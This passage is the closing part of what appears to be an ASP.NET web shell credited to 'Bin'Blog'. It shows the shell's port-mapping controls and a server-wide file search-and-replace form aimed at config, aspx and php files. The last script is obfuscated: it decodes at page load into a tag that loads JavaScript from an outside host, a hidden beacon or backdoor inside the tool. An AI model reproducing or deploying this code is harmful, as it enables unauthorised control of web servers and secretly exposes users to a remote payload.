2551. <td style="width:20%" align="left">Remote Port : <input class="input" runat="server" id="ZHS" type="text" size="20" value="80"/></td></tr>
2552. <tr align="center"><td colspan="5"><br/><asp:Button ID="FJE" CssClass="bt" runat="server" Text="MapPort" OnClick="wDZ"/> <asp:Button ID="giX" CssClass="bt" runat="server" Text="ClearAll" OnClick="vJNsE"/> <asp:Button ID="GFsm" CssClass="bt" runat="server" Text="Refresh" OnClick="tYoZ"/></td></tr></table></div>
2553. <%--Search--%>
2554. <div id="yhv" runat="server">
2555. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
2556. <tr align="center">
2557. <td style="width:20%" align="left">Keyword</td>
2558. <td style="width:60%" align="left"><textarea id="iaMKl" runat="server" class="area" style="width:100%" rows="4"></textarea></td>
2559. <td style="width:20%" align="left"><input type="checkbox" runat="server" id="rAQ" value="1"/> Use Regex</td>
2560. </tr>
2561. <tr align="center">
2562. <td style="width:20%" align="left">Replace As</td>
2563. <td style="width:60%" align="left"><textarea id="qPe" runat="server" class="area" style="width:100%" rows="4"></textarea></td>
2564. <td style="width:20%" align="left"><input type="checkbox" runat="server" id="YZw"/> Replace</td>
2565. </tr>
2566. <tr align="center">
2567. <td style="width:20%" align="left">Search FileType</td>
2568. <td style="width:60%" align="left"><input type="text" runat="server" class="input" id="UDLvA" style="width:100%" value="asp|asa|cer|cdx|aspx|asax|ascx|cs|jsp|php|txt|inc|ini|js|htm|html|xml|config"/></td>
2569. <td style="width:20%" align="left"><asp:DropDownList runat="server" ID="Ven" AutoPostBack="False" CssClass="list"><asp:ListItem Value="name">File Name</asp:ListItem><asp:ListItem Value="content" Selected="True">File Content</asp:ListItem></asp:DropDownList></td>
2570. </tr>
2571. <tr align="center">
2572. <td style="width:20%" align="left">Path</td>
2573. <td style="width:60%" align="left"><input type="text" class="input" id="NaLJ" runat="server" style="width:100%" /></td>
2574. <td style="width:20%" align="left"><asp:Button CssClass="bt" id="axy" runat="server" onclick="NBy" Text="Start" /></td>
2575. </tr>
2576. </table>
2577. <br/>
2578. <br/>
2579. <asp:Table ID="oJiym" runat="server" Width="100%" CellSpacing="0" >
2580. <asp:TableRow CssClass="head"><asp:TableCell Width="60%">File Path</asp:TableCell><asp:TableCell Width="20%">Last modified</asp:TableCell><asp:TableCell Width="20%">Size</asp:TableCell></asp:TableRow>
2581. </asp:Table>
2582. </div>
2583. </td></tr></table>
2584. <div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;">Copyright &copy; 2006-2009 <a href="http://www.rootkit.net.cn" target="_blank">Bin'Blog</a> All Rights Reserved.</div></div>
2585. </form>
2586. <script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%264DTDSJQU%2631MBOHVBHF%264E%2633kbwbtdsjqu%2633%2631TSD%264E%2633iuuq%264B00s68d%3A%3A/dpn0o4xti4m0dj%7B/kt%2633%264F%261B%261B%264D0TDSJQU%264F%261B%261%3A%261%3A%261%3A1')</script>
2587. </body>
2588. </html>